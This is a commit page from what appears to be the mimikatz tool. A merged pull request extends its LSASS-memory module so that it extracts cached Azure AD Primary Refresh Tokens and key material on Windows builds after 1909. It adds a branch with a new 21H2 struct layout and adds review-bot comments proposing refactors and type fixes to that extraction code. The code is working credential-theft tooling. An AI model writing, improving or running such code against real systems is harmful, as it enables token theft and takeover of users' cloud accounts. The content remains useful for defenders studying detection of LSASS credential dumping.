Merge pull request #400 from dmb2168/master

cloudap support for versions > 1909
This commit is contained in:
Benjamin DELPY 2022-07-29 21:34:40 +02:00 committed by GitHub
commit a2271237d1
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 83 additions and 25 deletions


@ -29,45 +29,89 @@ NTSTATUS kuhl_m_sekurlsa_cloudap(int argc, wchar_t * argv[])
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_cloudap(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KIWI_CLOUDAP_CACHE_LIST_ENTRY cache;
KIWI_CLOUDAP_CACHE_UNK unk;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, pData->cLsass->hLsassMem};
KIWI_GENERIC_PRIMARY_CREDENTIAL creds = {0};
if(kuhl_m_sekurlsa_cloudap_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_cloudap_package.Module, CloudApReferences, ARRAYSIZE(CloudApReferences), (PVOID *) &CloudApGlobalLogonSessionList, NULL, NULL, NULL))
{
aLsassMemory.address = CloudApGlobalLogonSessionList;
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
if (pData->cLsass->osContext.BuildNumber > KULL_M_WIN_BUILD_10_1909)
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, LocallyUniqueIdentifier), pData->LogonId))
{
if(logon.cacheEntry)
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2)))
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
if(logon.cacheEntry)
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
}
}
else
{
KIWI_CLOUDAP_LOGON_LIST_ENTRY logon;
KULL_M_MEMORY_ADDRESS aLocalMemory = {&logon, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
if(aLsassMemory.address = kuhl_m_sekurlsa_utils_pFromLinkedListByLuid(&aLsassMemory, FIELD_OFFSET(KIWI_CLOUDAP_LOGON_LIST_ENTRY, LocallyUniqueIdentifier), pData->LogonId))
{
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_LOGON_LIST_ENTRY)))
{
if(logon.cacheEntry)
{
aLocalMemory.address = &cache;
aLsassMemory.address = logon.cacheEntry;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_LIST_ENTRY)))
{
kprintf(L"\n\t Cachedir : %s", cache.toname);
if(cache.cbPRT && cache.PRT)
{
creds.UserName.Length = creds.UserName.MaximumLength = (USHORT) cache.cbPRT;
creds.UserName.Buffer = (PWSTR) cache.PRT;
}
if(cache.toDetermine)
{
aLocalMemory.address = &unk;
aLsassMemory.address = cache.toDetermine;
if(kull_m_memory_copy(&aLocalMemory, &aLsassMemory, sizeof(KIWI_CLOUDAP_CACHE_UNK)))
{
kprintf(L"\n\t Key GUID : ");
kull_m_string_displayGUID(&unk.guid);
creds.Password.Length = creds.Password.MaximumLength = (USHORT) unk.unkSize;
creds.Password.Buffer = (PWSTR) unk.unk;
}
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
kuhl_m_sekurlsa_genericCredsOutput(&creds, pData, KUHL_SEKURLSA_CREDS_DISPLAY_CLOUDAP_PRT);
}
}
}
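Review bot: The body of the new `> KULL_M_WIN_BUILD_10_1909` branch (cache copy, `Cachedir`/`Key GUID` output, `creds` fill-in, `kuhl_m_sekurlsa_genericCredsOutput` call) is repeated verbatim in the `else` branch; the two differ only in the list-entry type (`KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2` vs `KIWI_CLOUDAP_LOGON_LIST_ENTRY`) and the `FIELD_OFFSET` passed to `kuhl_m_sekurlsa_utils_pFromLinkedListByLuid`. Since both branches end up with a `logon.cacheEntry` of the same `PKIWI_CLOUDAP_CACHE_LIST_ENTRY` type, the shared part could be a single `static` helper taking `pData` and the `cacheEntry` pointer, so the next layout change (the header already carries an `_11` variant of the entry) only touches the lookup, not two copies of the output code. The build-number test also deserves a one-line comment on why 1909 is the cut-off, e.g. `// LUID/cacheEntry moved in the logon list entry after 1909 (20H1+); see KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2` — I am inferring the reason from the struct names, so please adjust the wording. Minor style: `if (pData->cLsass->osContext.BuildNumber ...)` uses `if (` while the rest of the file writes `if(`. The enclosing `else`, the outer `if` and the function itself close outside this hunk.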


@ -90,4 +90,18 @@ typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_11 {
DWORD unk6;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_11, *PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11;
typedef struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2 {
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Flink;
struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY* Blink;
DWORD unk0;
DWORD unk1;
DWORD unk2;
LUID LocallyUniqueIdentifier;
DWORD unk3;
DWORD64 unk4;
DWORD64 unk5;
PKIWI_CLOUDAP_CACHE_LIST_ENTRY cacheEntry;
// ...
} KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2, * PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2;
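Review bot: `Flink` and `Blink` of the new `_KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2` are typed as `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY*`, i.e. pointers to the pre-20H1 layout, although on a 21H2 list they point at entries of this new layout. The pointer size is the same so the copy in the caller still works, but any later traversal through `logon.Flink` would be read with the wrong field offsets; the self-referential form `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2* Flink;` / `struct _KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2* Blink;` makes the type honest. Also, the closing typedef `* PKIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2` puts a space after the `*`, unlike `*PKIWI_CLOUDAP_LOGON_LIST_ENTRY_11` on the line above; the `_11` entry and the new `_21H2` entry differ in their `unk` fields, so a short comment on which Windows builds each layout was verified against would help the next person who has to add a variant.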